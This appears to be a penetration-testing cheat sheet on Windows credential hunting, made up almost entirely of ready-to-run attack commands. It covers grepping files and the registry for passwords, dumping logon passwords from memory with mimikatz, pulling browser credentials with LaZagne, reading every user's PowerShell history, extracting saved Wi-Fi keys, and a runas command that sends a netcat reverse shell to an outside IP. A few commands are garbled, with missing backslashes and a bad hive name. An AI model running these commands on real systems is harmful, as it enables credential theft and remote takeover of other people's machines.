Credential Hunting

FILE SEARCHING COMMANDS¶

Search for potentially risky files in the current directory and its subdirectories:
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* == *user*
Search for cleartext credentials:
gci * -Include *.xml -Recurse -EA SilentlyContinue | select-string cpassword
search for IIS Web config file
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Find Files Containing "Password" Across Common Configuration File Types:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.ps1 *.bat *.zip
Hunt for SAM and SYSTEM Backups
cd C: & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK
Use Tools Like winPEAS to Search for Files Containing Credentials:
.\winPEASany.exe quiet cmd searchfast filesinfo

SEARCHING FOR CREDENTIALS IN THE REGISTRY¶

Search for Passwords in HKEY_LOCAL_MACHINE (HKLM)
reg query HKLM /f password /t REG_SZ /s
Search for Passwords in HKEY_CURRENT_USER (HKCU)
reg query HKLU /f password /t REG_SZ /s
Retrieve Credentials from PuTTY
reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessions /f "Proxy" /s

SAVED WINDOWS CREDENTIALS¶

Windows provides the functionality to use and save other users' credentials. The following commands help list and Use these saved credentials:

Automatically Identify Saved Credentials with winPEAS:
.\winPEASx64.exe quiet cmd windowscreds
Check AutoLogon Credentials in registry:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
Extract plaintext passwords from memory using mimikatz:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
Manually List Saved Credentials:
cmdkey /list
Run Command with Saved Credentials:
runas /savecred /user:admin cmd.exe
Prepare to Receive a Reverse Shell with Netcat:
nc -lvnp 1337
Execute Commands Using Saved Credentials for a Reverse Shell:
runas /env /noprofile /savecred /user:DESKTOP-T3I4BBK\administrator "c:\temp\nc.exe [IP-ADRESS] 1337 -e cmd.exe"

POWERSHELL HISTORY FILE¶

Locate PowerShell History File:
(Get-PSReadLineOption).HistorySavePath
Read Contents of PowerShell History File:
gc (Get-PSReadLineOption).HistorySavePath
Retrieve PowerShell History Files for All Users:
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

BROWSER CREDENTIALS¶

Extract browser credentials using LaZagne:
lazagne.exe browsers
Chrome Password
gc 'C:UsersuserAppDataLocalGoogleChromeUser DataDefaultCustom Dictionary.txt' | Select-String password

POWERSHELL CREDENTIALS¶

Import Credentials from XML File:
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
Retrieve Username from Imported Credentials:
$credential.GetNetworkCredential().Username
Retrieve Password from Imported Credentials:
$credential.GetNetworkCredential().Password

Complete Example to Decrypt and Display Username and Password:

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$username = $credential.GetNetworkCredential().Username
$password = $credential.GetNetworkCredential().Password
"Username: $username"
"Password: $password"

STICKY NOTES PASSWORDS¶

Locate Sticky Notes Database Files:
ls C:\Users\[USER]\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
Set Execution Policy to Bypass for the Current Process:
PS C:\> Set-ExecutionPolicy Bypass -Scope Process
Change Directory to Where PSSQLite is Located:
PS C:\> cd .\PSSQLite\
Import the PSSQLite module:
PS C:\PSSQLite> Import-Module .\PSSQLite.psd1
Define the path to the Sticky Notes database file:
PS C:\PSSQLite> $db = 'C:\Users\[USER]\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Query Database to Retrieve Text of Notes:
PS C:\PSSQLite> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | Format-Table -Wrap
Extract and View Contents of Database File Using Strings Command:
strings 'C:\Users\[USER]\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite-wal'

WIFI PASSWORDS¶

View List of All Saved Wireless Networks:
PS C:\> netsh wlan show profile
Retrieve Password for a Specific Wireless Network Profile:
PS C:\> netsh wlan show profile [PROFILE-NAME] key=clear
Oneliner method to extract wifi passwords from all the access point.
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

UNATTEND.XML¶

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:

MANUALLY¶

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\sysprep.inf
C:\Windows\System32\sysprep\sysprep.xml

AUTOMATICALLY¶

Perform a detailed search for unattended and sysprep files:
Get-ChildItem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue
Search for specific log and configuration files:
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Search for the term 'password' in all files:
findstr /spin "password" *.*

Open the Unattend.xml File with a Text Editor to Review Content:

<AutoLogon>
    <Password>
        <Value>HackFast_p@ss</Value>
        <PlainText>true</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <LogonCount>2</LogonCount>
    <Username>Administrator</Username>
</AutoLogon>